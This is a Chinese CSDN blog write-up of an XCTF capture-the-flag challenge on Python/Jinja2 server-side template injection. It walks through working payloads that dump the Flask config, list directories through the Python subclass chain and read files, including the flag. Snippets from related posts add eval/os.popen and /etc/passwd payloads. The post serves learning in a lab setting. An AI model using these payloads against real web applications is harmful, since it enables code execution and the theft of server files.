xctf_python_template_injection

最新推荐文章于 2023-07-29 15:05:54 发布
最新推荐文章于 2023-07-29 15:05:54 发布
阅读量276 收藏
点赞数 1
分类专栏: WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/107430426
版权

[目标]
Python模板注入
[环境]
Windows
[工具]
浏览器
[分析]
1.根据题目可看出是python的模板注入
在这里插入图片描述
在这里插入图片描述

发现执行此命令,因此是SSTI
2.利用{{}}来查看服务器配置
命令{{config.items()}}
在这里插入图片描述

3.执行命令,查看目录
os.listdir() 方法用于返回指定的文件夹包含的文件或文件夹的名字的列表。这个列表以字母顺序。 它不包括 ‘.’ 和’…’ 即使它在文件夹中。
只支持在 Unix, Windows 下使用。
使用python的魔法方法命令直接查询目录
命令:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
在这里插入图片描述

找到两个文件名
4.查看文件index.py
命令:{{''.__class__.__mro__[2].__subclasses__()[40]('index.py').read()}}
在这里插入图片描述

Flask是一个微型的 Python 开发的 Web 框架,基于Werkzeug WSGI工具箱和Jinja2 模板引擎。

*查看文件fl4g
命令:{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
这里必须是40,因为这是object类的一个文件子类
在这里插入图片描述
得到flag。

关于python的魔术方法payload可具体查看
https://xuanxuanblingbling.github.io/ctf/web/2019/01/02/python/

番茄酱料
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1145
好难啊
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3463
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
【愚公系列】2023年05月 攻防世界-Web(Web_python_template_injection
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
攻防世界web进阶区Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1642
攻防世界web进阶区Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
Web安全(Web_python_template_injection
m0_56010012的博客
03-01 1598
可以知道题目是template injection题目。 由此可知,说明存在“SSTI”。关于SSTI即服务端模板注入攻击,服务端接受用户输入,将其作为 Web 应用模板的一部分,渲染编译后执行了恶意内容,导致敏感信息泄露、代码执行等。 常规的魔术方法,如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。 __class__ #返回type类型,查看对象的类型 __bases__ #返回tuple类型,列出该类的基类 __mro__ #返回tuple...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1346
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
攻防世界之Web_python_template_injection (web进阶)
my_name_is_sy的博客
06-29 1974
考点为模板漏洞及其利用。
WEB:Web_python_template_injection
最新发布
sleepywin的博客
07-29 235
可以看到当前目录下有个fl4g,执行cat fl4g。打开题目,发现页面提示,翻译为python模板注入。利用site.Printer的os模块执行命令。python模板注入。
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6900
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
XCTF_A_成本管理标准功能培训.pptx
09-25
XCTF_A_成本管理标准功能培训.pptx
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3334
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
Flask入门系列(三)–模板
ASP.NET
11-03 245
在第一篇中,我们讲到了Flask中的Controller和Model,但是一个完整的MVC,没有View怎么行?前端代码如果都靠后台拼接而成,就太麻烦了。本篇,我们就介绍下Flask中的View,即模板。 系列文章 Flask入门系列(一)-Hello World Flask入门系列(二)-路由 Flask入门系列(三)-模板 Flask入门系列(四)-请求,响应及会话 Flask入门...
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3661
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
攻防世界XCTF:Web_python_template_injection
末初的CSDN博客
03-13 761
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6621
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值